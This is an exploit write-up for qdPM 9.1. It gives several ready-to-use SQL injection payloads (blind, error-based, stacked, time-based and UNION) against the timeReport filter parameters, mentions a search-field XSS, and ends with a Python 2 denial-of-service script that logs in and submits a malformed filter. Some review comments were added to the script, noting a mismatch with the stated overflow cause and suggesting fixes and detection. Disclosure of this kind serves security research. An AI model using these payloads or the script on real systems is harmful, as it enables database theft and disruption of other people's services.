# Exploit Title: qdPM 9.1 - Multiple Vulnerabilities
# Date: 2018-11-01
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: XAMPP for Linux 5.6.38-0
# Software description:
# Free project management tool for small team
# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.
# It is fully configurable. You can easily manage Projects, Tasks and People. Customers interact
# using a Ticket System that is integrated into Task management.
################################################################
# Vulnerabilities:
# The application contains three different vulnerabilities:
# SQL Injection, Cross-Site Scripting and Denial of Service.
################################################################
# POC 1 : SQL Injection :
# An attacker can gain access to all the database information using the filter_by[CommentCreatedFrom]
# and filter_by[CommentCreatedTo] parameters.
#
# Parameter: filter_by[CommentCreatedFrom] and filter_by[CommentCreatedTo] (POST)
# Request URL: /index.php/timeReport
#
#    Type: boolean-based blind
#    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
#    Payload: filter_by[CommentCreatedFrom]=2018-10-30") RLIKE (SELECT (CASE WHEN (7166=7166) THEN #0x323031382d31302d3330 ELSE 0x28 END)) AND ("votm"="votm&filter_by[CommentCreatedTo]=2018-10-17
#
#    Type: error-based
#    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
#    Payload: filter_by[CommentCreatedFrom]=2018-10-30") AND EXTRACTVALUE(2944,CONCAT(0x5c,0x716a766b71,(SELECT #(ELT(2944=2944,1))),0x7178717871)) AND ("ilfY"="ilfY&filter_by[CommentCreatedTo]=2018-10-17
#
#    Type: stacked queries
#    Title: MySQL > 5.0.11 stacked queries (comment)
#    Payload: filter_by[CommentCreatedFrom]=2018-10-30");SELECT SLEEP(5)#&filter_by[CommentCreatedTo]=2018-10-17
#
#    Type: AND/OR time-based blind
#    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
#    Payload: filter_by[CommentCreatedFrom]=2018-10-30") AND 2173=BENCHMARK(5000000,MD5(0x7652785a)) AND #("PRig"="PRig&filter_by[CommentCreatedTo]=2018-10-17
#
#    Type: UNION query
#    Title: Generic UNION query (NULL) - 40 columns
#    Payload: filter_by[CommentCreatedFrom]=2018-10-30") UNION ALL SELECT #33,33,33,33,33,33,33,33,33,33,CONCAT(0x716a766b71,0x474b474f65666b437365466773655373776743495a75536670676f41445249514775775a6f4d6a63,0x7178717871),#33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33-- #pqmn&filter_by[CommentCreatedTo]=2018-10-17
#---
################################################################
# POC 2 : Cross-Site Scripting :
# Almost all pages have a vulnerability in the "Search" input field in the upper right corner.
# Navigate to "Search" and enter an XSS payload.
# An alert box will appear on the page.
################################################################
# POC 3 : Denial of Service :
# There is a DoS vulnerability in the time reports page.
# You can send more data than the number of bytes allowed via the filter_by[CommentCreatedFrom]
# and filter_by[CommentCreatedTo] parameters, in which the time interval is specified.
# When the oversized data has been sent, "timeReport" falls into the
# Fatal error page and the page cannot be used for a long time.
# You can use the following Python code for the exploit.
################################################################

----- python script -----
#!/usr/bin/python
# Proof of concept for the time-report Denial of Service described above.
# Python 2 only: it uses the print statement, raw_input, cookielib and
# urllib.urlencode. mechanize is a third-party package; re is imported but
# not used anywhere in this script.

import re, mechanize
import urllib, sys
import cookielib
 
# Banner.
print "\n[*] qdPM v.9.1 - Denial of Service"
print "[*] Vulnerability discovered by AkkuS"
print "[*] My Blog - https://www.pentest.com.tr\n"
# Exactly one command-line argument is required; it is read into rhost below
# and used as the host part of both request URLs. Note that the usage path
# exits with status 0, so a wrapper cannot tell it apart from a normal run.
if (len(sys.argv) != 2):
    print "[*] Usage: poc.py "
    exit(0)
 
rhost = sys.argv[1]

# Credentials of an existing qdPM account are prompted for interactively;
# the filter request further down is sent from that logged-in session.
# NOTE(review): raw_input echoes the password to the terminal.
UserMail = str(raw_input("User Mail: "))
Password = str(raw_input("Password: "))
 
# Log in through the application's own login form.
print "[*] Loging in..."
br = mechanize.Browser()
# Do not let mechanize apply robots.txt rules to the requests below.
br.set_handle_robots(False)

# Cookie jar that carries the session cookie from the login to the
# time-report request.
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)

# The URL scheme is hard-coded to http://, so the login form (including the
# password) is sent unencrypted.
br.open("http://"+rhost+"/index.php/login")
# Stop unless the login URL returned an HTML document.
assert br.viewing_html()
# The form is selected by name and then again by index (first form on the
# page); the later call is the one in effect when the fields are filled in.
br.select_form(name="loginForm")
br.select_form(nr=0)
br.form['login[email]'] = UserMail
br.form['login[password]'] = Password
br.submit()

# Only the resulting page title is printed; the script does not otherwise
# check whether the login succeeded.
title = br.title()
print "You are in "+title+" now"

# POST body for the time-report filter. CommentCreatedFrom carries a
# non-date string containing SQL fragments (the RLIKE/CASE expression also
# listed under POC 1) and CommentCreatedTo is the literal 'foo'.
# NOTE(review): the description above speaks of sending more data than the
# allowed number of bytes, but this value is short; presumably the fatal
# error comes from the malformed filter value reaching the query - confirm
# against the application. Server-side, validating both fields as dates and
# binding them as query parameters would address this and the SQL injection
# in the same parameters.
data = urllib.urlencode({'filter_by[CommentCreatedFrom]':'2018-10-30 ) RLIKE (SELECT (CASE WHEN (7166=7166) THEN 0x323031382d31302d3330 ELSE 0x28 END)) AND (votm','filter_by[CommentCreatedTo]':'foo'})
# Passing data makes mechanize send the request as a POST.
r = br.open("http://"+rhost+"/index.php/timeReport", data)

# Per the author: a fatal error in the response means the DoS succeeded and
# the user can no longer use the time reports page.
# For detection, such requests appear as POSTs to /index.php/timeReport whose
# filter_by[CommentCreatedFrom] / filter_by[CommentCreatedTo] values are not
# dates.
print "[*] ===== Response ===== "

print r.read()   

print "[*] ==================== "